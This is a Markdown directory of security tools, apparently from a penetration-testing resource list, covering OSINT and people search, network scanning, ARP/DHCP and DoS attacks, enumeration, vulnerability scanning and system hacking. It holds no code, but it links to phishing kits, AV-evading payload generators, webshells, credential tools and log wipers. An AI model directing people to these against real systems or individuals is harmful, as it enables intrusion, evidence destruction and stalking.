* [Alexa](https://www.alexa.com/)
* [Euromonitor](https://www.euromonitor.com/)
* [Market Watch](https://www.marketwatch.com/)
* [The Wall Street Transcript](https://www.twst.com/)

##### What do expert opinions say about the company?
* [ABI/INFORM Global](https://www.proquest.com/)
* [Attention Meter](http://www.attentionmeter.com/)
* [SEMrush](https://es.semrush.com/)
* [SimilarWeb](https://www.similarweb.com/)

#### Enumerate people, emails, ...
* [Contact Out](https://contactout.com/): Get private information from LinkedIn accounts.
* [';--have i been pwned?](https://haveibeenpwned.com/): Check if your email address is in a data breach.
* [hunter.io](https://hunter.io/): Hunter lets you find email addresses in seconds and connect with the people that matter for your business.
* [Instant People Search](https://www.privateeye.com/): People search.
* [intelius](https://www.intelius.com/): People search.
* [peekyou](https://www.peekyou.com/): People search.
* [pipl](https://pipl.com/): People search.
* [pwndb](https://github.com/davidtavarez/pwndb): Search for leaked credentials.
* [Social Catfish](https://socialcatfish.com/): People search.
* [theHarvester](https://github.com/laramies/theHarvester): E-mails, subdomains and names harvester (OSINT).
* [VerifyEmailAddress.org](http://verifyemailaddress.org/)

#### Email tracking tools
* [eMailTrackerPro](http://www.emailtrackerpro.com/): Trace an email using the email header.
* [Infoga](https://github.com/m4ll0k/Infoga): Infoga is a tool for gathering email account information (IP, hostname, country, ...) from different public sources (search engines, PGP key servers and Shodan) and checking whether the emails were leaked, using the haveibeenpwned.com API. It is a really simple tool, but very effective for the early stages of a penetration test, or just to learn the visibility of your company on the Internet.
* [Mailtrack](https://mailtrack.io/es/): Know when your emails are opened.
* [PoliteMail](https://politemail.com/)
* [RMail E-Security](https://rmail.com/)

#### Extracting Metadata of Public Documents
* [Exiftool](https://github.com/exiftool/exiftool): ExifTool meta information reader/writer.
* [Metagoofil](https://github.com/laramies/metagoofil): Metadata harvester.
* [Opanda IExif](http://opanda.com/en/iexif/index.html): A professional Exif viewer for Windows / IE / Firefox. From a photographer's point of view, it displays the image taken by a digital camera and every item of EXIF data in the image, from beginning to end.
* [Web Data Extractor](http://www.webextractor.com/): Web Data Extractor Pro is a web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. A special feature of WDE Pro is custom extraction of structured data.

#### Extracting Website Links
* [Link Extractor](https://www.iwebtool.com/link_extractor): Very simple tool that scrapes all the links from any web page on the Internet.
* [Netpeak Spider](https://netpeaksoftware.com/spider): Desktop tool for day-to-day SEO audit, fast issue checks, comprehensive analysis, and website scraping.
* [Octoparse](https://github.com/octoparse): Octoparse is a free, multi-award-winning web scraping software that turns websites into structured data without coding.
#### Find subdomains of a domain
* [Search Web by Domain](https://searchdns.netcraft.com/)
* [Sublist3r](https://github.com/aboul3la/Sublist3r): Fast subdomain enumeration tool for penetration testers.

#### Footprinting
* [Bill Cipher](https://github.com/GitHackTools/BillCipher): Information gathering tool for a website or IP address.
* [FOCA](https://www.elevenpaths.com/es/innovacion-laboratorio/herramientas/foca)
* [Maltego](https://www.maltego.com/): Maltego is an open source intelligence (OSINT) and graphical link analysis tool for gathering and connecting information for investigative tasks.
* [OSINT Framework](https://osintframework.com/)
* [OSRFramework](https://github.com/i3visio/osrframework): The Open Sources Research Framework is an AGPLv3+ project by i3visio focused on providing an API and tools to perform more accurate online research.
* [Raccoon](https://github.com/evyatarmeged/Raccoon): A high performance offensive security tool for reconnaissance and vulnerability scanning.
* [ReconDog](https://github.com/s0md3v/ReconDog): Reconnaissance Swiss Army knife.
* [Recon-ng](https://github.com/lanmaster53/recon-ng): Open source intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
* [Th3Inspector](https://github.com/Moham3dRiahi/Th3inspector)

#### Instagram
* [Osintgram](https://github.com/Datalux/Osintgram): An OSINT tool for Instagram. It offers an interactive shell to perform analysis on the Instagram account of any user by its nickname.
#### IP geolocation lookup
* [IPQuery](https://ipquery.io)
* [GeoIP API](https://api.ip.sb/geoip)
* [IP2Location](https://www.ip2location.com/)
* [IP Location Finder](https://www.iplocation.net/)

#### Mirroring an entire website
* [Cyotek](https://www.cyotek.com/cyotek-webcopy): Copy websites locally for offline browsing.
* [HTTrack WebSite Copier](https://github.com/xroche/httrack): Copy websites to your computer.
* [NCollector Studio](http://www.calluna-software.com/)
* [Social-Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit): An open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly.
* [ShellPhish](https://github.com/suljot/shellphish): Phishing tool for Instagram, Facebook, Twitter, Snapchat and Github.

#### Monitoring webpages for updates and changes
* [visualping](https://visualping.io/): Monitor website changes so you don't have to!
* [Website-Watcher](https://www.aignes.com/): Monitor websites for new content and changes.

#### Monitoring website traffic of the target company
* [Alexa](https://www.alexa.com/): Find, reach, and convert your audience.
* [TeamViewer Web Monitoring](https://www.teamviewer.com/es/remote-management/monitorizacion-de-web/): Monitor the web experience (formerly Monitis).
* [Web-Stat](https://www.web-stat.com/)

#### Phone number
* [phoneinfoga](https://github.com/sundowndev/PhoneInfoga): Advanced information gathering and OSINT framework for phone numbers.
#### Traceroute
* [IT Management Software & Remote Monitoring Tools | SolarWinds](https://www.solarwinds.com/)
* [Path Analyzer Pro](https://www.pathanalyzer.com/): Path Analyzer Pro delivers advanced network route-tracing with performance tests, DNS, whois, and network resolution to investigate network issues. By integrating all these features into one simple graphical interface, Path Analyzer Pro has become a must-have tool for any network, systems, or security professional on Windows and Mac OS X.
* [VisualRoute](http://www.visualroute.com/)

#### Twitter
* [#onemilliontweetmap](https://onemilliontweetmap.com/)
* [Creepy](https://www.geocreepy.com/): Creepy is a geolocation OSINT tool. It gathers geolocation-related information from online sources and allows presentation on a map, search filtering based on exact location and/or date, and export in CSV or KML format for further analysis in Google Maps.
* [First Tweet - Who Said It First on Twitter](http://ctrlq.org/first/)
* [foller.me](https://foller.me/): Twitter analytics application that gives you rich insights about any public Twitter profile: near real-time data about topics, mentions, hashtags, followers, location and more.
* [Followerwonk](https://followerwonk.com/): Helps to explore and grow one's social graph by digging deeper into Twitter analytics.
* [Omnisci](https://www.omnisci.com/demos/tweetmap)
* [tinfoleak](https://github.com/vaguileradiaz/tinfoleak): The most complete open-source tool for Twitter intelligence analysis.
#### Website footprinting
* [Burp Suite](https://portswigger.net/burp)
* [Find Subdomains Online | Pentest-Tools.com](https://pentest-tools.com/information-gathering/find-subdomains-of-domain)
* [Wappalyzer](https://github.com/AliasIO/wappalyzer): Identifies technologies on websites, including content management systems, ecommerce platforms, JavaScript frameworks, analytics tools and much more.
* [Website informer](https://chrome.google.com/webstore/detail/website-informer-addon/hgmkhdckpblkakgojblgmlgaeaimofom): Evaluates the authority and popularity of the websites you are visiting.
* [What's that site running? | Netcraft](https://sitereport.netcraft.com/): Find out the infrastructure and technologies used by any site, using results from Netcraft's internet data mining.
* [Zaproxy](https://github.com/zaproxy/zaproxy): The OWASP Zed Attack Proxy (ZAP) is one of the world's most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing them.

##### Website footprinting using spiders
* [ParseHub](https://www.parsehub.com/): A free and powerful web scraping tool. With its advanced web scraper, extracting data is as easy as clicking on the data you need.
* [SpiderFoot](https://www.spiderfoot.net/): Automates OSINT collection and helps you find what matters.
* [Web Data Extractor](http://www.webextractor.com/): A web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. A special feature of WDE Pro is custom extraction of structured data.
151 | * [webscarab-ng](https://code.google.com/archive/p/webscarab-ng/): WebScarab-NG is a complete rewrite of the old WebScarab application, with a special focus on making the application more user-friendly. 152 | 153 | ### Networks 154 | * [Angry IP Scanner](https://github.com/angryip/ipscan): Fast and friendly network scanner 155 | * [Capsa Portable Network Analyzer](https://www.colasoft.com/capsa/): Monitor, Analyze, Troubleshoot your Wired & Wireless Network. 156 | * [Colasoft Packet Builder](https://www.colasoft.com/packet_builder/): Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier. 157 | * [hping](https://github.com/antirez/hping): hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation, and almost arbitrary packet size and content, using the command line interface. 158 | * [HTTPort 3.SNFM](https://www.targeted.org/htthost/): HTTPort allows you to bypass your HTTP proxy, which is blocking you from the Internet. With HTTPort you may use various Internet software from behind the proxy, ex. e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, etc. 159 | * [Jaqen](https://github.com/LinkedInAttic/jaqen): Simple DNS rebinding. 160 | * [Megaping](http://www.magnetosoft.com/product/megaping/features): MegaPing is the ultimate must-have toolkit that provides essential utilities for Information System specialists, system administrators, IT solution providers or individuals. 161 | * [Metasploit Framework](https://github.com/rapid7/metasploit-framework) 162 | * [Nav](https://github.com/Uninett/nav): Network Administration Visualized. 
163 | * [netCut](https://www.arcai.com/netCut/s/): With netCut, you can know who has is or has been on your WIFI, his name, device brand, what time in, what time out. 164 | * [NetScanTools](https://www.netscantools.com/nstpromain.html): NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically** or with manual tools. It is designed for the Windows operating system GUI. **Automated tools are started interactively by the user. Include a promiscous detection scanner. 165 | * [NetSurveyor](http://nutsaboutnets.com/archives/netsurveyor-wifi-scanner/): It is an 802.11 (WiFi) network discovery tool that gathers information about nearby wireless access points in real time and displays it in useful ways. Similar in purpose to NetStumbler, it includes many more features. 166 | * [Network Topology Mapper](https://www.solarwinds.com/es/network-topology-mapper): Network mapping software designed to automatically map your network. 167 | * [Nmap](https://github.com/nmap/nmap): The Network Mapper. 168 | * [Omnipeek Network Protocol Analyzer](https://www.liveaction.com/products/omnipeek-network-protocol-analyzer/) 169 | * [Ostinato](https://github.com/pstavirs/ostinato): Packet/Traffic Generator and Analyzer. 170 | * [sparta](https://github.com/SECFORCE/sparta): Network Infrastructure Penetration Testing Tool: NMap + hydra. 171 | * [SteelCentral Packet Analyzer](https://support.riverbed.com/content/support/software/steelcentral-npm/packet-analyzer.html) 172 | * [Unicornscan](https://github.com/dneufeld/unicornscan) 173 | * [wireshark](https://github.com/wireshark/wireshark): Wireshark is a network traffic analyzer, or "sniffer", for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows. 
It uses Qt, a graphical user interface library, and libpcap and npcap as packet capture and filtering libraries. 174 | 175 | #### Android 176 | * [Fing](https://play.google.com/store/apps/details?id=com.overlook.android.fing) 177 | * [netCut](https://arcai.com/netcut-for-android/): With netCut, you can know who has is or has been on your WIFI, his name, device brand, what time in, what time out. 178 | * [Network IP Scanner](https://play.google.com/store/apps/details?id=com.goodidea.network.ipscanner) 179 | * [Network Scanner](https://play.google.com/store/apps/details?id=com.easymobile.lan.scanner) 180 | * [Network Spoofer](https://sourceforge.net/projects/netspoof/): Lets you change websites on other people’s computers from an Android phone. After downloading simply log onto a Wifi network, choose a spoof to use and press start. 181 | * [WHO'S ON MY WIFI - NETWORK SCANNER](https://play.google.com/store/apps/details?id=com.magdalm.wifinetworkscanner) 182 | 183 | #### ARP 184 | 185 | ##### ARP Poisoning 186 | * [Cain](https://github.com/xchwarze/Cain) 187 | * [Ettercap](https://www.ettercap-project.org/): It is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. 188 | 189 | ##### Protection 190 | * [ARP AntiSpoofer](https://sourceforge.net/projects/arpantispoofer/): A utility for detecting and resisting BIDIRECTIONAL ARP spoofing. It can anti-spoof for not only the local host, but also other hosts in the same subnet. It is as well a handy helper for gateways which don't work well with ARP. 
191 | * [ArpON](https://sourceforge.net/projects/arpon/): It is a Host-based solution that make the ARP standardized protocol secure in order to avoid the Man In The Middle (MITM) attack through the ARP spoofing, ARP cache poisoning or ARP poison routing attack. 192 | * [arpstraw](https://github.com/he2ss/arpstraw): Arp spoof detection tool. 193 | * [shARP](https://github.com/europa502/shARP): An anti-ARP-spoofing application software that use active and passive scanning methods to detect and remove any ARP-spoofer from the network. 194 | * [XArp – Advanced ARP Spoofing Detection](http://www.xarp.net/): It is a security application that uses advanced techniques to detect ARP based attacks. 195 | 196 | #### DHCP 197 | 198 | ##### DHCP starvation attack 199 | * [DHCPig](https://github.com/kamorin/DHCPig): DHCP exhaustion script written in python using scapy network library. 200 | * [dhcpstarv](http://dhcpstarv.sourceforge.net/): Is tool that implements DHCP starvation attack. It requests DHCP leases on specified interface, save them and renew on regular basis. 201 | * [Gobbler](http://gobbler.sourceforge.net/) 202 | * [Hyenae](https://sourceforge.net/projects/hyenae/): It is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant. 203 | * [yersinia](https://github.com/tomac/yersinia): A framework for layer 2 attacks. 204 | 205 | ##### Rogue DHCP attack 206 | * [Cain](https://github.com/xchwarze/Cain) 207 | 208 | #### DoS 209 | * [hping3](https://github.com/antirez/hping): hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation, and almost arbitrary packet size and content, using the command line interface. 
210 | * [High Orbit Ion Cannon (HOIC)](https://sourceforge.net/projects/highorbitioncannon/) 211 | * [Low Orbit Ion Cannon (LOIC)](https://github.com/NewEraCracker/LOIC): An open source network stress tool, written in C#. Based on Praetox's LOIC project. 212 | 213 | ##### Protection 214 | * [Anti DDoS Software](http://www.anti-ddos.net/): Monitors each incoming and outgoing packet in Real-Time. It displays the local address, remote address, and other information of each network flow. Anti DDoS Guardian limits network flow number, client bandwidth, client concurrent TCP connection number, and TCP connection rate. It also limits the UDP bandwidth, UDP connection rate, and UDP packet rate. 215 | * [DDoS-GUARD](https://ddos-guard.net/) 216 | * [DOSarrest’s DDoS protection service](https://www.dosarrest.com/) 217 | * [Cloudflare](https://www.cloudflare.com/) 218 | * [ID Ransomware](https://id-ransomware.malwarehunterteam.com/): Upload a ransom note and/or sample encrypted file to identify the ransomware that has encrypted your data. 219 | * [Imperva Incapsula DDoS Protection](https://www.imperva.com/products/ddos-protection-services/) 220 | 221 | #### MAC address 222 | 223 | ##### MAC flood attack 224 | * [macof](https://linux.die.net/man/8/macof): Flood a switched LAN with random MAC addresses. 225 | * [yersinia](https://github.com/tomac/yersinia): A framework for layer 2 attacks. 226 | 227 | ##### MAC Spoofing 228 | * [SMAC](https://www.klcconsulting.net/smac/): FREE MAC Address Spoofing Tool. 229 | * [Technitium MAC Address Changer (TMAC)](https://technitium.com/tmac/): A freeware utility to spoof MAC address instantly. 230 | 231 | 232 | 233 | --- 234 | 235 | 236 | 237 | ### Enumeration 238 | * [Active Directory Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer): It is an advanced Active Directory (AD) viewer and editor. 
You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute. 239 | * [Advanced IP Scanner](https://www.advanced-ip-scanner.com/): Reliable and free network scanner to analyse LAN. The program shows all network devices, gives you access to shared folders, provides remote control of computers (via RDP and Radmin), and can even remotely switch computers off. It is easy to use and runs as a portable edition. It should be the first choice for every network admin. 240 | * [Amass](https://github.com/OWASP/Amass): The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques. 241 | * [dig](https://github.com/polarityio/dig): Network admin tool for querying DNS servers. 242 | * [dirsearch](https://github.com/maurosoria/dirsearch): Web path scanner. 243 | * [dnsrecon](https://github.com/darkoperator/dnsrecon): DNS Enumeration Script. 244 | * [dnswalk](https://github.com/davebarr/dnswalk): A DNS database debugger. 245 | * [domained](https://github.com/TypeError/domained): Multi Tool Subdomain Enumeration. 246 | * [Engineer's Toolset](https://www.solarwinds.com/engineers-toolset): Network software with over 60 must-have tools. 247 | * [enum4linux](https://github.com/CiscoCXSecurity/enum4linux): It is a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. 248 | * [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness): EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. 
249 | * [Global Network Inventory](http://www.magnetosoft.com/product/global_network_inventory/features): Global Network Inventory is a powerful and flexible software and hardware inventory system that can be used as an audit scanner in an agent-free and zero deployment environments. If used as an audit scanner, it only requires full administrator rights to the remote computers you wish to scan. Global Network Inventory can audit remote computers and even network appliances, including switches, network printers, document centers, etc. 250 | * [gobuster](https://github.com/OJ/gobuster): Directory/File, DNS and VHost busting tool written in Go. 251 | * [google-url-extractor.js](https://github.com/DragonJAR/Scripts/blob/master/google-url-extractor.js): Small script that extracts all URLs from a Google search result. 252 | * [httprobe](https://github.com/tomnomnom/httprobe): Take a list of domains and probe for working HTTP and HTTPS servers. 253 | * [Hurricane Electric BGP Toolkit](https://bgp.he.net/) 254 | * [jxplorer](http://jxplorer.org/downloads/): It is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface. 255 | * [Knock](https://github.com/guelfoweb/knock): Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Now knockpy supports queries to VirusTotal subdomains, you can setting the API_KEY within the config.json file. 
256 | * [LDAP Account Manager](https://www.ldap-account-manager.org/lamcms/releases) 257 | * [LDAP Admin](http://www.ldapadmin.org/download/ldapadmin.html) 258 | * [LDAP Administrator](https://www.ldapadministrator.com/download.htm) 259 | * [massdns](https://github.com/blechschmidt/massdns): A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration). 260 | * [NetBIOS Enumerator](http://nbtenum.sourceforge.net/): This application was suggested to show how to use remote network support and how to deal with some other interesting web technics like SMB. 261 | * [NetScanTools](https://www.netscantools.com/nstpromain.html): NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically** or with manual tools. It is designed for the Windows operating system GUI. **Automated tools are started interactively by the user. 262 | * [Network Browser](https://www.solarwinds.com/es/network-performance-monitor/use-cases/ip-network-browser): NPM uses the SNMP protocol to send requests across your network and receive responses containing key configuration data, including system details and device failures. This is especially beneficial when dealing with large and dynamic networks using equipment from multiple vendors. Just provide a list of IP addresses or subnets along with SNMP credentials, and the NPM Network Sonar Wizard will automatically scan for devices. 263 | * [Network Performance Monitor](https://www.solarwinds.com/es/network-performance-monitor): Multi-vendor network monitoring that scales and expands with the needs of your network. 264 | * [nmap-vulners](https://github.com/vulnersCom/nmap-vulners/blob/master/http-vulners-regex.nse): Identifies the used software for each found http port and builds CPEs for the identified versions. 
265 | * [nsauditor](http://www.nsauditor.com/) 266 | * [nsec3map](https://github.com/anonion0/nsec3map): A tool to enumerate the resource records of a DNS zone using its DNSSEC NSEC or NSEC3 chain 267 | * [NSEarch (Nmap Script Engine Search)](https://github.com/jtibaquira/nsearch): Minimal script to help find script into the nse database. 268 | * [PsTools](https://docs.microsoft.com/en-us/sysinternals/downloads/pstools) 269 | * [RPCScan](https://github.com/hegusung/RPCScan): Tool to communicate with RPC services and check misconfigurations on NFS shares 270 | * [snmpcheck](https://github.com/pwnieexpress/pwn_plug_sources/blob/master/src/snmpcheck/snmpcheck-1.8.pl): Like to snmpwalk, snmpcheck permits to enumerate information via SNMP protocol. 271 | * [SoftPerfect Network Scanner](https://www.softperfect.com/products/networkscanner/): Can ping computers, scan ports, discover shared folders and retrieve practically any information about network devices via WMI, SNMP, HTTP, SSH and PowerShell. It also scans for remote services, registry, files and performance counters; offers flexible filtering and display options and exports NetScan results to a variety of formats from XML to JSON. 272 | * [subbrute](https://github.com/TheRook/subbrute): A DNS meta-query spider that enumerates DNS records, and subdomains. 273 | * [subfinder](https://github.com/projectdiscovery/subfinder): Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing. 274 | * [Sublist3r](https://github.com/aboul3la/Sublist3r): Fast subdomains enumeration tool for penetration testers. 275 | * [SuperEnum](https://github.com/p4pentest/SuperEnum): This script does the basic enumeration of any open port along with screenshots. 
276 | * [SystemTools Hyena](https://www.systemtools.com/hyena/): Using the built-in Windows administration tools to manage a medium to large Windows network or Active Directory environment can be a challenge. Add multiple domains, hundreds or thousands of servers, workstations, and users, and before you know it, things can get out of hand. Hyena is designed to both simplify and centralize nearly all of the day-to-day management tasks, while providing new capabilities for system administration. This functionality is provided in a single, centralized, easy to use product. Used today by tens of thousands of system administrators worldwide, Hyena is the one tool that every administrator cannot afford to be without. 277 | * [waybackurls](https://github.com/tomnomnom/waybackurls): Fetch all the URLs that the Wayback Machine knows about for a domain. 278 | * [wfuzz](https://github.com/xmendez/wfuzz): Web application fuzzer. 279 | 280 | 281 | 282 | --- 283 | 284 | 285 | 286 | ### Vulnerability Analysis 287 | 288 | #### Vulnerability Scanning 289 | * [GFI LanGuard](https://www.gfihispana.com/products-and-solutions/network-security-solutions/gfi-languard) 290 | * [Nessus](https://www.tenable.com/products/nessus): Scanning for vulnerabilities in various operating systems. It consists of a daemon, nessusd, which performs the scan on the target system, and nessus, the client which displays the progress and reports on the status of the scans. 291 | * [nikto](https://github.com/sullo/nikto): Nikto web server scanner. 292 | * [OpenVAS](https://www.openvas.org/): It is a full-featured vulnerability scanner. Its capabilities include unauthenticated testing, authenticated testing, various high level and low level Internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test. 
293 | * [skipfish](https://code.google.com/archive/p/skipfish/): Is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments. 294 | * [Vulnerability Scanning Tools by OWASP](https://owasp.org/www-community/Vulnerability_Scanning_Tools) 295 | 296 | #### Databases 297 | * [CVE mitre](https://cve.mitre.org/): The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 298 | * [CWE mitre](https://cwe.mitre.org/): It is a community-developed list of software and hardware weakness types. It serves as a common language, a measuring stick for security tools, and as a baseline for weakness identification, mitigation, and prevention efforts. 299 | * [National Vulnerability Database](https://nvd.nist.gov/): The NVD is the U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics. 300 | * [Objective-See](https://objective-see.com/malware.html) 301 | * [SecurityFocus](https://www.securityfocus.com/) 302 | * [Talos - Vulnerability Information](https://talosintelligence.com/vulnerability_info): Talos investigates software and operating system vulnerabilities in order to discover them before malicious threat actors do. We provide this information to vendors so that they can create patches and protect their customers as soon as possible. 
303 | 304 | 305 | 306 | --- 307 | 308 | 309 | 310 | ### System hacking 311 | * [https://github.com/9emin1/charlotte](https://github.com/9emin1/charlotte): c++ fully undetected shellcode launcher ;). 312 | * [DSInternals](https://github.com/MichaelGrafnetter/DSInternals): The DSInternals project consists of these two parts: 1 - The DSInternals Framework exposes several internal features of Active Directory and can be used from any .NET application. The codebase has already been integrated into several 3rd party commercial products that use it in scenarios like Active Directory disaster recovery, identity management, cross-forest migrations and password strength auditing. 2 - The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of the Framework. 313 | * [EagleShell](https://github.com/TRSTN4/EagleShell): EagleShell is a high-quality tool that aims to improve your pentest. 314 | * [Metasploit Framework](https://github.com/rapid7/metasploit-framework) 315 | * [mimikatz](https://github.com/gentilkiwi/mimikatz): A little tool to play with Windows security. 316 | * [MSFvenom Payload Creator (MSFPC)](https://github.com/g0tmi1k/msfpc): A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). 317 | * [ntdsxtract](https://github.com/csababarta/ntdsxtract): Active Directory forensic framework. 318 | * [PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite): Here you will find privilege escalation tools for Windows and Linux/Unix and MacOS. These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily. 319 | * [php-webshells](https://github.com/JohnTroony/php-webshells): Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. 
Do not host the file(s) on your server! 320 | * [PowerTools](https://github.com/PowerShellEmpire/PowerTools): PowerTools is a collection of PowerShell projects with a focus on offensive operations. 321 | * [unicorn](https://github.com/trustedsec/unicorn): It is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. 322 | * [Veil](https://github.com/Veil-Framework/Veil): It is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. 323 | * [venom](https://github.com/r00t-3xp10it/venom): The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( C# | python | ruby | dll | msi | hta-psh | docm | apk | macho | elf | deb | mp4 | etc ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file. 324 | * [wevtutil](https://docs.microsoft.com/es-es/windows-server/administration/windows-commands/wevtutil): Enables you to retrieve information about event logs and publishers. You can also use this command to install and uninstall event manifests, to run queries, and to export, archive, and clear logs. 325 | * [WhiteWinterWolf's PHP web shell](https://github.com/WhiteWinterWolf/wwwolf-php-webshell) 326 | 327 | #### Android 328 | * [PhoneSploit](https://github.com/aerosol-can/PhoneSploit): A tool for remote ADB exploitation in Python3 for all Machines. 329 | * [Quick Android Review Kit (QARK)](https://github.com/linkedin/qark): Tool to look for several security related Android application vulnerabilities. 
330 | * [Quixxi Vulnerability Scanner](https://vulnerabilitytest.quixxi.com/#/) 331 | * [Shellshock Vulnerability Scan](https://play.google.com/store/apps/details?id=in.indiandragon.shellshock.shellshockvulnerabilityscan&hl=es&gl=US): Free, fastest & open Source app to scan for Shellshock vulnerability in Android. 332 | * [Vulners Scanner](https://play.google.com/store/apps/details?id=com.vulners&hl=en_US&gl=US): It implements technology of passive vulnerability scanning based on software version fingerprint. 333 | * [Yaazhini](https://www.vegabird.com/yaazhini/): Free Android APK & API Vulnerability Scanner. 334 | * [zANTI](https://www.zimperium.com/zanti-mobile-penetration-testing): It is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network. 335 | 336 | #### iOS 337 | * [Trident](https://github.com/benjamin-42/Trident): This exploits the following two CVEs: CVE-2016-4655, allow an attacker to obtain sensitive information from kernel memory via a crafted app; and CVE-2016-4656, allow an attacker to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. 338 | 339 | #### Privilege Escalation / Post exploitation 340 | * [BeRoot](https://github.com/AlessandroZ/BeRoot): It is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. 341 | * [linpostexp](https://github.com/reider-roque/linpostexp): ux post exploitation enumeration and exploit checking tools. 
342 | * [meterpreter - getsystem](https://docs.rapid7.com/metasploit/meterpreter-getsystem/) 343 | * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/): A PowerShell Post-Exploitation Framework 344 | 345 | #### Exploit databases 346 | * [Circl](https://cve.circl.lu/) 347 | * [CVE mitre](https://cve.mitre.org/): The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 348 | * [cxsecurity](https://cxsecurity.com/exploit) 349 | * [Exploit Database](https://www.exploit-db.com/) 350 | * [SecurityFocus](https://www.securityfocus.com/) 351 | * [VulDB](https://vuldb.com/) 352 | * [Vulners](https://vulners.com/) 353 | 354 | #### Logs 355 | * [auditpol](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol): Displays information about and performs functions to manipulate audit policies. 356 | * [BleachBit](https://www.bleachbit.org) 357 | * [Clear_Event_Viewer_Logs.bat](https://www.tenforums.com/tutorials/16588-clear-all-event-logs-event-viewer-windows.html) 358 | * [DBAN](https://dban.org) 359 | * [Log-killer](https://github.com/Rizer0/Log-killer): Clear all your logs in [linux/windows] servers. 360 | * [Privacy Eraser](https://www.cybertronsoft.com) 361 | * [Wipe](https://privacyroot.com) 362 | 363 | #### Password cracking / Login brute-forcer 364 | * [Brutus Password Cracker](https://www.darknet.org.uk/2006/09/brutus-password-cracker-download-brutus-aet2zip-aet2/) 365 | * [Cain](https://github.com/xchwarze/Cain): Password recovery tool for Microsoft Operating Systems. 
